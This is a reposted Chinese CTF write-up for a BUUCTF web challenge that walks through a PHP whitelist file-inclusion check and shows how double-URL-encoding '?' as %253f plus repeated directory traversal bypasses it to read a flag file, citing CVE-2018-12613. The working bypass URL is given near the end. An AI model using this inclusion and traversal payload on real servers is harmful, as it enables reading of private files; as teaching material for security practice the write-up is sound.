本文共 3415 字,大约阅读时间需要 11 分钟。
BUUCFT web第一题
F12观察到提示source.php 源代码为"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't see it"; return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; } } if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) ) { include $_REQUEST['file']; exit; } else { echo ""; } ?>
$whitelist = ["source"=>"source.php","hint"=>"hint.php"]; //这一段代码提示我们hint.php提示我们flag在ffffllllaaaagggg里面 首先分析这段代码
if (! empty($_REQUEST['file']) //$_REQUEST['file']值非空 && is_string($_REQUEST['file']) //$_REQUEST['file']值为字符串 && emmm::checkFile($_REQUEST['file']) //能够通过checkFile函数校验 ) { include $_REQUEST['file']; //包含$_REQUEST['file']文件 exit; } else { echo ""; //打印滑稽表情 }
一个if语句要求传入的file变量:
非空类型为字符串能够通过checkFile()函数校验
同时满足以上三个要求即可包含file中的文件,否则打印滑稽表情
回到上面checkFile()函数highlight_file(__FILE__); //打印代码 class emmm //定义emmm类 { public static function checkFile(&$page)//将传入的参数赋给$page { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];//声明$whitelist(白名单)数组 if (! isset($page) || !is_string($page)) { //若$page变量不存在或非字符串 echo "you can't see it";//打印"you can't see it" return false;//返回false } if (in_array($page, $whitelist)) {//若$page变量存在于$whitelist数组中 return true;//返回true } $_page = mb_substr(//该代码表示截取$page中'?'前部分,若无则截取整个$page $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page);//url解码$page $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; } }
可以看到函数代码中有四个if语句
第一个if语句对变量进行检验,要求$page为字符串,否则返回false第二个if语句判断$page是否存在于$whitelist数组中,存在则返回true第三个if语句判断截取后的$page是否存在于$whitelist数组中,截取$page中'?'前部分,存在则返回true第四个if语句判断url解码并截取后的$page是否存在于$whitelist中,存在则返回true若以上四个if语句均未返回值,则返回false
有三个if语句可以返回true,第二个语句直接判断$page,不可用
第三个语句截取’?‘前部分,由于?被后部分被解析为get方式提交的参数,也不可利用 第四个if语句中,先进行url解码再截取,因此我们可以将?经过两次url编码,在服务器端提取参数时解码一次,checkFile函数中解码一次,仍会解码为’?’,仍可通过第四个if语句校验。(’?‘两次编码值为’%253f’),构造url: http://***/source.php?file=source.php%253f…/ffffllllaaaagggg 无返回值,由于我们不知道ffffllllaaaagggg文件的具体位置,只能依次增加…/,最终在 http://***/source.php?file=source.php%253f…/…/…/…/…/ffffllllaaaagggg中成功回显flag该漏洞cve编号为CVE-2018-12613
转自: https://www.jianshu.com/p/36eaa95068ca
转载地址:http://dyhzi.baihongyu.com/